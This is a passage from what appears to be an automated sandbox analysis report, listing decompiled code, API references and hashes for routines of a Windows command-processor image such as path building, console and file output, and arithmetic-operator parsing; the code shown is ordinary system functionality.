										if(_t357 - _t367 - 0x414 >> 1 < _t341) {
											_t252 = 0x20;
											 *_t357 = _t252;
											_t357 = _t357 + 2;
											__eflags = _t357;
										}
									}
									_t360 = _t357 + E4A74270D(_t367 - 0x89c, 0, _t357, 0x104 - (_t357 - _t367 - 0x414 >> 1)) * 2;
									__eflags = _t360 - _t367 - 0x414;
									if(_t360 != _t367 - 0x414) {
										__eflags = _t360 - _t367 - 0x414 >> 1 - 0x207;
										if(_t360 - _t367 - 0x414 >> 1 < 0x207) {
											_t248 = 0x20;
											 *_t360 = _t248;
											_t360 = _t360 + 2;
											__eflags = _t360;
										}
									}
									__eflags = 0x104 - (_t360 - _t367 - 0x414 >> 1);
									_t357 = _t360 + E4A73D701(_t360, _t367 - 0x89c, 0, _t360, 0x104 - (_t360 - _t367 - 0x414 >> 1)) * 2;
									_t341 = 0x207;
								}
								__eflags =  *(_t367 - 0x828) & 0x00000400;
								if(( *(_t367 - 0x828) & 0x00000400) != 0) {
									__eflags = _t357 - _t367 - 0x414;
									if(_t357 != _t367 - 0x414) {
										__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
										if(_t357 - _t367 - 0x414 >> 1 < _t341) {
											_t229 = 0x20;
											 *_t357 = _t229;
											_t357 = _t357 + 2;
											__eflags = _t357;
										}
									}
									 *((intOrPtr*)(_t367 - 0x854)) =  *((intOrPtr*)(_t367 - 0x858));
									 *(_t367 - 0x850) =  *(_t367 - 0x85c);
									_t357 = _t357 + E4A74292F(0, _t367 - 0x854, 0, _t357, 0x208 - (_t357 - _t367 - 0x414 >> 1)) * 2;
								}
								goto L35;
							}
							_t332 = 0;
							__eflags =  *0x4a77088c - _t332; // 0x64
							if(__eflags == 0) {
								goto L102;
							}
							_t253 = 0x4a77088c;
							while(1) {
								_t334 = _t332 >> 1;
								__eflags = _t332 >> 1 - _t341;
								if(_t332 >> 1 >= _t341) {
									goto L102;
								}
								_t336 =  *(_t367 - 0x878);
								__eflags =  *(_t253 - 4) & _t336;
								if(( *(_t253 - 4) & _t336) == 0) {
									_t334 = 0x2d;
								} else {
									_t334 =  *_t253;
								}
								 *_t357 = _t334;
								_t357 = _t357 + 2;
								_t253 = _t253 + 8;
								_t332 = _t332 + 2;
								__eflags =  *_t253;
								if( *_t253 != 0) {
									continue;
								} else {
									goto L102;
								}
							}
							goto L102;
						}
						L35:
						_t199 =  *(_t367 - 0x828);
						__eflags = _t199 & 0x00008000;
						if((_t199 & 0x00008000) == 0) {
							__eflags =  *(_t367 - 0x83c);
							if( *(_t367 - 0x83c) == 0) {
								goto L36;
							}
							L48:
							_push(_t367 - 0x414);
							goto L49;
						}
						L36:
						__eflags = _t357 - _t367 - 0x414;
						if(_t357 != _t367 - 0x414) {
							_t334 = _t367 - 0x414;
							__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
							if(_t357 - _t367 - 0x414 >> 1 < _t341) {
								_t321 = 0x20;
								 *_t357 = _t321;
								_t357 = _t357 + 2;
							}
						}
						__eflags = _t199 & 0x00000001;
						if((_t199 & 0x00000001) != 0) {
							L47:
							__eflags = 0x208 - (_t357 - _t367 - 0x414 >> 1);
							E4A73185A(_t357, 0x208 - (_t357 - _t367 - 0x414 >> 1), _t367 - 0x824);
							goto L48;
						} else {
							__eflags =  *(_t367 - 0x834);
							if( *(_t367 - 0x834) != 0) {
								__eflags = _t199 & 0x0000001e;
								if((_t199 & 0x0000001e) != 0) {
									goto L39;
								}
								goto L47;
							}
							L39:
							_t342 = _t367 - 0x820;
							__eflags = _t199 & 0x00000002;
							if((_t199 & 0x00000002) == 0) {
								E4A73185A(_t367 - 0x824, 0x208, _t342);
								_t48 = _t367 - 0x82c;
								 *_t48 =  *(_t367 - 0x82c) - 4;
								__eflags =  *_t48;
								_t342 = _t367 - 0x824;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000004;
							if(( *(_t367 - 0x828) & 0x00000004) == 0) {
								__eflags = 0x208 - (_t342 - _t367 - 0x824 >> 1);
								E4A73185A(_t342, 0x208 - (_t342 - _t367 - 0x824 >> 1),  *(_t367 - 0x82c));
								 *(_t367 - 0x82c) = _t342;
							}
							_t206 = wcsrchr( *(_t367 - 0x82c), 0x2e);
							__eflags = _t206;
							if(_t206 == 0) {
								 *(_t367 - 0x83c) =  *(_t367 - 0x83c) & _t206;
								_t206 = _t367 - 0x83c;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000010;
							if(( *(_t367 - 0x828) & 0x00000010) == 0) {
								__eflags = 0;
								 *_t206 = 0;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000008;
							if(( *(_t367 - 0x828) & 0x00000008) == 0) {
								E4A73185A( *(_t367 - 0x82c), 0x208 - ( *(_t367 - 0x82c) - _t367 - 0x824 >> 1), _t206);
							}
							goto L47;
						}
					}
				}
			}

0x4a736c46
0x4a736c46
0x4a736c46
0x4a736c46
0x4a736c46
0x4a736c46
0x4a736c4f
0x4a736c53
0x00000000
0x4a736c59
0x4a736c5a
0x4a736c5f
0x4a736c63
0x4a736c69
0x4a736c6b
0x4a736c6b
0x00000000
0x4a736c63
0x4a746c49
0x4a746c49
0x4a746c49
0x4a746c50
0x00000000
0x00000000
0x00000000
0x00000000
0x4a746c6c
0x4a746c6c
0x4a746bc8
0x4a746bce
0x4a746bce
0x4a746bce
0x4a73767e
0x4a73767e
0x4a73767f
0x4a737680
0x4a737683
0x4a737686
0x00000000
0x00000000
0x4a737607
0x4a737607
0x4a73760b
0x00000000
0x00000000
0x4a73760d
0x4a737619
0x4a73761b
0x4a73761e
0x4a737620
0x00000000
0x00000000
0x4a737622
0x4a73762c
0x4a737630
0x4a737632
0x4a73fd36
0x4a73fd3c
0x4a73fd3c
0x4a73763e
0x4a737641
0x4a737644
0x4a737645
0x4a73fcf1
0x4a73fcf1
0x4a73fcf1
0x4a73fcf4
0x4a746c03
0x4a746c03
0x00000000
0x4a746c03
0x4a73fcfa
0x4a73fcfa
0x4a73fcfa
0x4a73fcfb
0x4a746bf4
0x4a746bf4
0x00000000
0x4a746bf4
0x4a73fd01
0x4a73fd01
0x4a73fd01
0x4a73fd04
0x4a746bdd
0x4a746bde
0x4a746bdf
0x00000000
0x00000000
0x4a746be5
0x4a746be5
0x00000000
0x4a746be5
0x4a73fd0a
0x4a73fd0a
0x00000000
0x4a73764b
0x4a73764b
0x4a73764b
0x4a737990
0x4a737990
0x00000000
0x4a737990
0x4a737651
0x4a737651
0x4a737651
0x4a737654
0x4a746bce
0x4a746bce
0x00000000
0x4a746bd8
0x4a73765a
0x4a73765a
0x4a73765a
0x4a73765d
0x4a737981
0x4a737981
0x00000000
0x4a737981
0x4a737663
0x4a737664
0x4a737664
0x4a737665
0x4a73fd47
0x4a73fd47
0x00000000
0x4a73fd47
0x4a73766b
0x4a73766b
0x4a73766e
0x4a742374
0x4a742374
0x4a74237b
0x4a742382
0x4a742382
0x4a7351bc
0x4a7351bf
0x4a7351c0
0x4a7351c3
0x4a7351ca
0x4a7351ca
0x4a74237d
0x4a746c64
0x4a746c69
0x4a746c6c
0x4a746bc8
0x00000000
0x4a737674
0x4a737674
0x4a737674
0x4a737674
0x00000000
0x4a737674
0x4a73766e
0x4a737645
0x4a73768c
0x4a73768c
0x4a73768f
0x4a737696
0x4a737699
0x4a73fd19
0x4a73fd1f
0x4a73fd25
0x4a7376bc
0x4a7376c6
0x4a7376c9
0x4a7376ca
0x4a7376cc
0x00000000
0x00000000
0x4a7376d2
0x4a7376e0
0x4a7376e8
0x4a7376ea
0x00000000
0x00000000
0x4a7376ec
0x4a7376ec
0x4a7376f0
0x00000000
0x00000000
0x4a7376f6
0x4a7376f6
0x4a7376fa
0x4a737922
0x4a737927
0x4a737929
0x4a73792f
0x4a737935
0x4a73793b
0x4a737942
0x4a737948
0x4a73794e
0x4a737954
0x4a737954
0x4a73794e
0x4a737942
0x4a737935
0x4a737929
0x00000000
0x4a7376fa
0x4a73769f
0x4a73769f
0x4a7376a3
0x4a746c12
0x4a746c13
0x4a746c17
0x4a746c23
0x4a746c26
0x4a746c27
0x4a746c29
0x00000000
0x00000000
0x4a746c2f
0x4a746c39
0x4a746c43
0x4a746c45
0x4a746c47
0x4a746c79
0x4a746c85
0x4a746c91
0x4a746c97
0x4a746c9c
0x4a746ca3
0x4a746ca5
0x4a746ca5
0x4a746ca5
0x4a746ca5
0x4a746cac
0x4a746cb3
0x4a746cb4
0x00000000
0x4a746cb4
0x00000000
0x4a746c47
0x4a7376a9
0x4a7376b0
0x4a7376b4
0x4a7376b6
0x00000000
0x00000000
0x00000000
0x4a7376b6
0x4a746bce
0x4a746c6c
0x4a746c52
0x00000000
0x4a746c52
0x4a737700
0x4a737711
0x4a737713
0x4a737715
0x4a735273
0x4a735279
0x4a73527c
0x4a735281
0x4a7351ba
0x4a7351ba
0x00000000
0x4a735287
0x00000000
0x4a735281
0x4a73771b
0x4a73771f
0x4a7351b2
0x4a7351b4
0x00000000
0x00000000
0x00000000
0x4a7351b4
0x4a737725
0x4a73772b
0x4a73f3dc
0x4a7378d6
0x4a7378db
0x00000000
0x4a7378db
0x4a737733
0x4a73773f
0x4a737745
0x4a746cc3
0x4a746cca
0x4a746d10
0x4a746d10
0x00000000
0x4a746d10
0x4a746ce4
0x4a746cea
0x4a746cf0
0x4a746cf2
0x00000000
0x00000000
0x4a746cf4
0x4a746cfb
0x4a746d01
0x4a746d01
0x00000000
0x4a73774b
0x4a737761
0x4a737767
0x4a737771
0x4a73777f
0x4a737793
0x4a737797
0x4a73779d
0x4a73779f
0x4a746d23
0x4a7377a5
0x4a7377a5
0x4a7377a5
0x4a7377a5
0x4a7377a5
0x4a7377ac
0x4a7377b3
0x00000000
0x4a7377b9
0x4a7377c1
0x4a7377cf
0x4a7377dd
0x4a7377dd
0x4a7377e2
0x4a7377e8
0x4a7377ee
0x4a7377f3
0x4a746d3e
0x4a746d44
0x4a746d46
0x00000000
0x00000000
0x4a746d4c
0x4a746d56
0x4a746d93
0x4a746d93
0x4a746d9d
0x4a746db1
0x4a746dbc
0x4a746dbe
0x4a746dcc
0x4a746dce
0x4a746dd2
0x4a746dd3
0x4a746dd7
0x4a746dd7
0x4a746dd7
0x4a746dce
0x4a746dfd
0x4a746e06
0x4a746e08
0x4a746e16
0x4a746e1b
0x4a746e1f
0x4a746e20
0x4a746e24
0x4a746e24
0x4a746e24
0x4a746e1b
0x4a746e31
0x4a746e43
0x4a746e46
0x4a746e46
0x4a746e4b
0x4a746e55
0x4a746e61
0x4a746e63
0x4a746e71
0x4a746e73
0x4a746e77
0x4a746e78
0x4a746e7c
0x4a746e7c
0x4a746e7c
0x4a746e73
0x4a746e83
0x4a746e8f
0x4a746eb7
0x4a746eb7
0x00000000
0x4a746e55
0x4a746d58
0x4a746d5a
0x4a746d61
0x00000000
0x00000000
0x4a746d63
0x4a746d68
0x4a746d6a
0x4a746d6c
0x4a746d6e
0x00000000
0x00000000
0x4a746d70
0x4a746d76
0x4a746d79
0x4a746d82
0x4a746d7b
0x4a746d7b
0x4a746d7b
0x4a746d83
0x4a746d87
0x4a746d89
0x4a746d8c
0x4a746d8d
0x4a746d91
0x00000000
0x00000000
0x00000000
0x00000000
0x4a746d91
0x00000000
0x4a746d68
0x4a7377f9
0x4a7377f9
0x4a7377ff
0x4a737804
0x4a746ebf
0x4a746ec6
0x00000000
0x00000000
0x4a7378cf
0x4a7378d5
0x00000000
0x4a7378d5
0x4a73780a
0x4a737810
0x4a737812
0x4a746ed3
0x4a746edd
0x4a746edf
0x4a746ee7
0x4a746ee8
0x4a746eec
0x4a746eec
0x4a746edf
0x4a737818
0x4a73781a
0x4a7378b3
0x4a7378c6
0x4a7378ca
0x00000000
0x4a737820
0x4a737820
0x4a737827
0x4a742389
0x4a74238b
0x00000000
0x00000000
0x00000000
0x4a742391
0x4a73782d
0x4a73782d
0x4a737833
0x4a737835
0x4a737842
0x4a737847
0x4a737847
0x4a737847
0x4a73784e
0x4a73784e
0x4a737854
0x4a73785b
0x4a737871
0x4a737875
0x4a73787a
0x4a73787a
0x4a737888
0x4a737890
0x4a737892
0x4a73fea7
0x4a73fead
0x4a73fead
0x4a737898
0x4a73789f
0x4a7378a1
0x4a7378a3
0x4a7378a3
0x4a7378a6
0x4a7378ad
0x4a737977
0x4a737977
0x00000000
0x4a7378ad
0x4a73781a
0x4a7377b3

APIs

GetFullPathNameW.KERNEL32(00000000,00000208,?,?,00000000), ref: 4A73775B
wcsrchr.MSVCRT ref: 4A737793
memset.MSVCRT ref: 4A7377CF
wcsrchr.MSVCRT ref: 4A737888

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: wcsrchr$FullNamePathmemset
String ID:
API String ID: 1865318540-0
Opcode ID: 41b4674206260db18ef5d9fce353743b9b4c904a7edf03018bffec05c02af524
Instruction ID: ed4aa6d6be97a6bb73c8af92786fee6929dae4a395e898e77074c1e0f3c167cc
Opcode Fuzzy Hash: 41b4674206260db18ef5d9fce353743b9b4c904a7edf03018bffec05c02af524
Instruction Fuzzy Hash: 90D196B1A185299ADF74CB24CD84BE97BF8FB44310F0181A9D589E6181DF719E88CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 4A73453E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E4A73453E(void* __eax, void* _a4, short* _a8, long _a12, DWORD* _a16) {
				long _v8;
				long _v12;
				int _t27;
				long _t29;
				int _t34;
				void* _t36;
				DWORD* _t39;
				void* _t40;
				void* _t46;
				long _t47;
				long _t51;
				intOrPtr _t52;

				_t47 = _a12;
				_v12 = _t47;
				__imp___get_osfhandle(_a4, _t46, _t36, _t40, _t40);
				_a4 = __eax;
				_t52 =  *0x4a770668; // 0x0
				if(_t52 != 0) {
					_t27 = WriteFile(__eax, _a8, _t47, _a16, 0);
				} else {
					while(_a12 > 0x2000) {
						_t29 = WideCharToMultiByte( *0x4a7541b8, 0, _a8, 0x1000, 0x4a756640, 0x2000, 0, 0);
						_a8 =  &(_a8[0x1000]);
						_a12 = _a12 - 0x2000;
						_v8 = _t29;
						if(WriteFile(_a4, 0x4a756640, _t29, _a16, 0) == 0) {
							L10:
							_t27 = 0;
							L7:
							goto L8;
						} else {
							if( *_a16 == _v8) {
								continue;
							} else {
								goto L10;
							}
						}
						L15:
					}
					if(_a12 == 0) {
						_t39 = _a16;
						goto L6;
					} else {
						_t34 = WideCharToMultiByte( *0x4a7541b8, 0, _a8, 0xffffffff, 0x4a756640, 0x2000, 0, 0);
						_t39 = _a16;
						_t51 = _t34 - 1;
						if(WriteFile(_a4, 0x4a756640, _t51, _t39, 0) == 0 ||  *_t39 != _t51) {
							goto L10;
						} else {
							L6:
							 *_t39 = _v12;
							_t27 = 1;
						}
					}
					goto L7;
				}
				L8:
				return _t27;
				goto L15;
			}

0x4a734547
0x4a73454d
0x4a734550
0x4a734559
0x4a73455c
0x4a734562
0x4a7486c2
0x4a734568
0x4a734579
0x4a7486e0
0x4a7486e6
0x4a7486e9
0x4a7486f0
0x4a748700
0x4a7425e7
0x4a7425e7
0x4a7345cc
0x00000000
0x4a748706
0x4a74870e
0x00000000
0x4a748714
0x00000000
0x4a748714
0x4a74870e
0x00000000
0x4a748700
0x4a734585
0x4a7425df
0x00000000
0x4a73458b
0x4a73459b
0x4a7345a2
0x4a7345a8
0x4a7345b6
0x00000000
0x4a7345c4
0x4a7345c4
0x4a7345c7
0x4a7345cb
0x4a7345cb
0x4a7345b6
0x00000000
0x4a734585
0x4a7345cd
0x4a7345d0
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 4A734550
WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A73459B
WriteFile.KERNEL32(?,4A756640,-00000001,4A744FE5,00000000), ref: 4A7345AE
WriteFile.KERNEL32(00000000,?,?,4A744FE5,00000000), ref: 4A7486C2
WideCharToMultiByte.KERNEL32(00000000,?,00001000,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A7486E0
WriteFile.KERNEL32(?,4A756640,00000000,4A744FE5,00000000), ref: 4A7486F8

Strings

@fuJ, xrefs: 4A73456F

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
String ID: @fuJ
API String ID: 3249344982-843781518
Opcode ID: 909d7cc86fb2b08dcf7187e7ae157052eb52bd643672bc6f5fbe29f0d90aa200
Instruction ID: c916e3ba072f71e0eeeae8328f04cdb91b83d6bbefa5dd4cceb59950af9661dd
Opcode Fuzzy Hash: 909d7cc86fb2b08dcf7187e7ae157052eb52bd643672bc6f5fbe29f0d90aa200
Instruction Fuzzy Hash: 4B316BB2505259BFEF318F91CC88C9B7FBDEB457A5B018165F915DA150D3308E54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 4A73F176, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A73F176(signed short** _a4, signed short** _a8, signed short** _a12) {
				long _t15;
				long _t20;
				wchar_t* _t21;
				signed short** _t33;

				_t33 = _a4;
				_t20 = E4A73F123(_t33) & 0x0000ffff;
				if(_t20 == 0 || iswdigit(_t20) != 0 || wcschr(L"<>+-*/%()|^&=,", _t20) != 0) {
					L12:
					return 0;
				} else {
					_t21 = L"+-~!";
					if(wcschr(_t21, _t20) != 0) {
						goto L12;
					}
					 *_a8 =  *_t33;
					while( *( *_t33) != 0) {
						_t15 =  *( *_t33) & 0x0000ffff;
						if(_t15 <= 0x20 || wcschr(_t21, _t15) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t33) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t33 =  &(( *_t33)[1]);
							continue;
						}
					}
					 *_a12 =  *_t33;
					return 1;
				}
			}

0x4a73f17e
0x4a73f187
0x4a73f18d
0x4a73f20b
0x00000000
0x4a73f1af
0x4a73f1b0
0x4a73f1bc
0x00000000
0x00000000
0x4a73f1c3
0x4a73f1c5
0x4a73f1cf
0x4a73f1d6
0x00000000
0x4a73f1f5
0x4a73f1f5
0x00000000
0x4a73f1f5
0x4a73f1d6
0x4a73f1ff
0x00000000
0x4a73f203

APIs

iswdigit.MSVCRT ref: 4A73F190
wcschr.MSVCRT ref: 4A73F1A7
wcschr.MSVCRT ref: 4A73F1B6
wcschr.MSVCRT ref: 4A73F1DA
wcschr.MSVCRT ref: 4A73F1ED

Strings

+-~!, xrefs: 4A73F1B0, 4A73F1B5, 4A73F1D9
<>+-*/%()|^&=,, xrefs: 4A73F1A2, 4A73F1E8

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: wcschr$iswdigit
String ID: +-~!$<>+-*/%()|^&=,
API String ID: 2770779731-632268628
Opcode ID: 801ac085567a9ad869b7979a462f12c24752f9b53cb6b3ab59ffc2670e5615b4
Instruction ID: a4ecc3fef67f6bd132863bfe05e0e258c528ad0a52a4e1fce717fc16f741c246
Opcode Fuzzy Hash: 801ac085567a9ad869b7979a462f12c24752f9b53cb6b3ab59ffc2670e5615b4
Instruction Fuzzy Hash: 2811C47B60E717ABA3608B69EC909667BECFB412F57224026F611CB2C1EB34D805C764

Uniqueness

Uniqueness Score: -1.00%

Function 4A73829A, Relevance: 12.1, APIs: 8, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 64%

			_entry_(long __ebx, void* __edx, LONG* __edi, intOrPtr __esi, void* __eflags) {
				long _v8;
				intOrPtr* _v24;
				long _v32;
				intOrPtr _v36;
				void* _t10;
				int _t11;
				intOrPtr _t13;
				void* _t14;
				int _t15;
				intOrPtr* _t16;
				long _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t26;
				intOrPtr _t28;
				long _t36;
				void* _t39;
				void* _t52;
				void* _t53;

				_t35 = __esi;
				_t34 = __edi;
				_t24 = __ebx;
				0x9d3ed(_t39);
				if(__eflags >= 0) {
					L7:
					_t10 = E4A738271(0x4a738378, 0x4a738384);
					_pop(_t26);
					if(_t10 != 0) {
						_v8 = 0xfffffffe;
						_t11 = 0xff;
						goto L27;
					} else {
						goto L8;
					}
				} else {
					E4A73264A(__ebx, __edi, __esi);
					_t24 = 0;
					_v8 = 0;
					_t36 =  *( *[fs:0x18] + 4);
					_v32 = 0;
					_t34 = 0x4a754204;
					while(1) {
						_t21 = InterlockedCompareExchange(_t34, _t36, _t24);
						if(_t21 == _t24) {
							break;
						}
						__eflags = _t21 - _t36;
						if(__eflags != 0) {
							Sleep(0x3e8);
							continue;
						} else {
							_t35 = 1;
							_v32 = 1;
						}
						L4:
						_t22 =  *0x4a754200; // 0x0
						if(_t22 == _t35) {
							L4A752309();
							_t26 = 0x1f;
							goto L8;
						} else {
							_t23 =  *0x4a754200; // 0x0
							if(_t23 != 0) {
								 *0x4a77090c = _t35;
								L8:
								_t13 =  *0x4a754200; // 0x0
								if(_t13 == _t35) {
									_push(0x4a738374);
									L4A737C76();
									_t26 = 0x4a73836c;
									 *0x4a754200 = 2;
								}
								if(_v32 == _t24) {
									InterlockedExchange(_t34, _t24);
								}
								_t52 =  *0x4a770688 - _t24; // 0x0
								if(_t52 != 0) {
									_t14 = E4A75227C(_t24, _t34, _t35, __eflags);
									_t26 = 0x4a770688;
									__eflags = _t14;
									if(_t14 != 0) {
										 *0x4a770688(_t24, 2, _t24);
									}
								}
								_push( *0x4a75423c);
								_push( *0x4a754240);
								_push( *0x4a754238);
								_t15 = L4A737308(_t26, _t34, _t35);
								 *0x4a754274 = _t15;
								_t53 =  *0x4a754138 - _t24; // 0x0
								if(_t53 != 0) {
									__eflags =  *0x4a77090c - _t24; // 0x0
									if(__eflags == 0) {
										__imp___cexit();
									}
									_v8 = 0xfffffffe;
									_t11 =  *0x4a754274; // 0x0
									L27:
									return E4A7313B6(_t11);
								} else {
									exit(_t15);
									_t16 = _v24;
									_t28 =  *((intOrPtr*)( *_t16));
									_v36 = _t28;
									_push(_t16);
									_push(_t28);
									L4A7521EE();
									return _t16;
								}
							} else {
								 *0x4a754200 = _t35;
								goto L7;
							}
						}
						goto L28;
					}
					_t35 = 1;
					goto L4;
				}
				L28:
			}

0x4a73829a
0x4a73829a
0x4a73829a
0x4a73829f
0x4a7382a4
0x4a7382f0
0x4a7382fb
0x4a738301
0x4a738304
0x4a7383d0
0x4a7383d7
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7382a6
0x4a7382a6
0x4a7382ab
0x4a7382ad
0x4a7382b6
0x4a7382b9
0x4a7382bc
0x4a7382c1
0x4a7382c4
0x4a7382cc
0x00000000
0x00000000
0x4a7383a4
0x4a7383a6
0x4a7383b8
0x00000000
0x4a7383a8
0x4a7383aa
0x4a7383ab
0x4a7383ab
0x4a7382d5
0x4a7382d5
0x4a7382dc
0x4a7383c5
0x4a7383ca
0x00000000
0x4a7382e2
0x4a7382e2
0x4a7382e9
0x4a738363
0x4a73830a
0x4a73830a
0x4a738311
0x4a738313
0x4a73831d
0x4a738323
0x4a738324
0x4a738324
0x4a738331
0x4a738335
0x4a738335
0x4a73833b
0x4a738341
0x4a7383e6
0x4a7383eb
0x4a7383ec
0x4a7383ee
0x4a7383f8
0x4a7383f8
0x4a7383ee
0x4a738347
0x4a73834d
0x4a738353
0x4a738359
0x4a738406
0x4a73840b
0x4a738411
0x4a73844a
0x4a738450
0x4a738452
0x4a738452
0x4a738458
0x4a73845f
0x4a738464
0x4a738469
0x4a738413
0x4a738414
0x4a73841a
0x4a73841f
0x4a738421
0x4a738424
0x4a738425
0x4a738426
0x4a73842d
0x4a73842d
0x4a7382eb
0x4a7382eb
0x00000000
0x4a7382eb
0x4a7382e9
0x00000000
0x4a7382dc
0x4a7382d4
0x00000000
0x4a7382d4
0x00000000

APIs

InterlockedCompareExchange.KERNEL32(4A754204,?,00000000), ref: 4A7382C4
_initterm.MSVCRT ref: 4A73831D
InterlockedExchange.KERNEL32 ref: 4A738335
exit.MSVCRT ref: 4A738414
_XcptFilter.MSVCRT ref: 4A738426

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ExchangeInterlocked$CompareFilterXcpt_inittermexit
String ID:
API String ID: 1199863589-0
Opcode ID: fcf103d25aef381c8427b79cb5044402c28480a1972236de9d99c12e4fa36acc
Instruction ID: 652f2b2ff33ee9b0201e2c9e946ce4e449dbc2a4a9cfb4357ea7c1918ce68496
Opcode Fuzzy Hash: fcf103d25aef381c8427b79cb5044402c28480a1972236de9d99c12e4fa36acc
Instruction Fuzzy Hash: 2C3124F584DA25EFEBB08FA4D88A95D3B7CFB41720B124069E101DAE42D7385C08CB55

Uniqueness

Uniqueness Score: -1.00%

Function 4A74F46A, Relevance: 12.1, APIs: 8, Instructions: 95fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 4A74F47C
FlushFileBuffers.KERNEL32(00000000), ref: 4A74F480

Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED

_get_osfhandle.MSVCRT ref: 4A74F4C6
SetFilePointer.KERNEL32(00000000), ref: 4A74F4CA
_get_osfhandle.MSVCRT ref: 4A74F4DC
ReadFile.KERNEL32(00000000), ref: 4A74F4E0

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File_get_osfhandle$BuffersFlushPointerRead_close
String ID:
API String ID: 2203007708-0
Opcode ID: 170befda794bf92abe04a845c041b134bd0e2faa78ae98a6ce9fedf5d87c28d6
Instruction ID: de2774d4ed88194d1fa5c6ea0ed2412de526fc5ff60d38250bae5813b285cc7f
Opcode Fuzzy Hash: 170befda794bf92abe04a845c041b134bd0e2faa78ae98a6ce9fedf5d87c28d6
Instruction Fuzzy Hash: D621BB72604115BBEF701FB4DD4ABDA3FA9EF057B1F214120F615CA0D0DAB0A814CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 4A735C8C, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E4A735C8C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t88;
				signed int _t90;
				signed int _t93;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t124;
				signed int _t125;
				intOrPtr* _t126;
				signed int _t128;
				signed short* _t130;
				signed int _t131;
				signed int _t134;
				intOrPtr* _t135;
				long _t137;
				intOrPtr* _t138;
				signed int _t149;
				signed int _t152;
				signed int _t154;
				long _t156;
				void* _t161;
				void* _t162;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t177;
				signed int _t180;
				signed short* _t183;
				signed int _t186;
				void* _t187;
				void* _t188;
				intOrPtr* _t189;
				void* _t190;
				intOrPtr _t191;
				intOrPtr* _t193;
				intOrPtr* _t194;
				intOrPtr _t197;
				signed short* _t199;
				void* _t200;

				_push(0x8c);
				_push(0x4a735fa8);
				E4A7313E1(__ebx, __edi, __esi);
				_t156 =  *((intOrPtr*)(_t200 + 8));
				 *((intOrPtr*)(_t200 - 0x98)) = _t156;
				 *((intOrPtr*)(_t200 - 0x94)) =  *((intOrPtr*)(_t200 + 0xc));
				 *((intOrPtr*)(_t200 - 0x8c)) = 0x70;
				 *((intOrPtr*)(_t200 - 0x88)) = 5;
				_t193 = 0;
				 *(_t200 - 0x84) = 0;
				memset(_t200 - 0x80, 0, 0x64);
				 *((intOrPtr*)(_t200 - 0x90)) = 0;
				_t81 =  *0x4a7540b4; // 0x0
				 *((intOrPtr*)(_t81 + 0x30)) = 0;
				 *0x4a754080 = 0;
				 *((intOrPtr*)(_t200 - 4)) = 0;
				_t196 = 0x4a768640;
				 *(_t200 - 0x84) = 0x4a768640;
				if( *0x4a754081 != 0) {
					__eax =  *(__ebx + 0x38);
					__eflags =  *( *(__ebx + 0x38)) - 0x3a;
					if( *( *(__ebx + 0x38)) == 0x3a) {
						__eax =  *0x4a7540b4; // 0x0
						__eax =  *(__eax + 0x110);
						 *(__ebp - 0x84) = __eax;
					}
				}
				_t84 =  *0x4a754014(1, _t200 - 0x8c, _t200 - 0x90, L"SCRIPT");
				__eflags = _t84;
				if(_t84 == 0) {
					L44:
					 *((intOrPtr*)(_t200 - 4)) = 0xfffffffe;
					goto L4;
				} else {
					_t88 =  *0x4a7540b4; // 0x0
					_t90 =  *0x4a754010( *((intOrPtr*)(_t200 - 0x90)), _t193, _t88 + 0x30, 1, _t193);
					__eflags = _t90;
					if(_t90 == 0) {
						_t156 = GetLastError();
						_t196 = 0x4ec;
						__eflags = _t156 - 0x4ec;
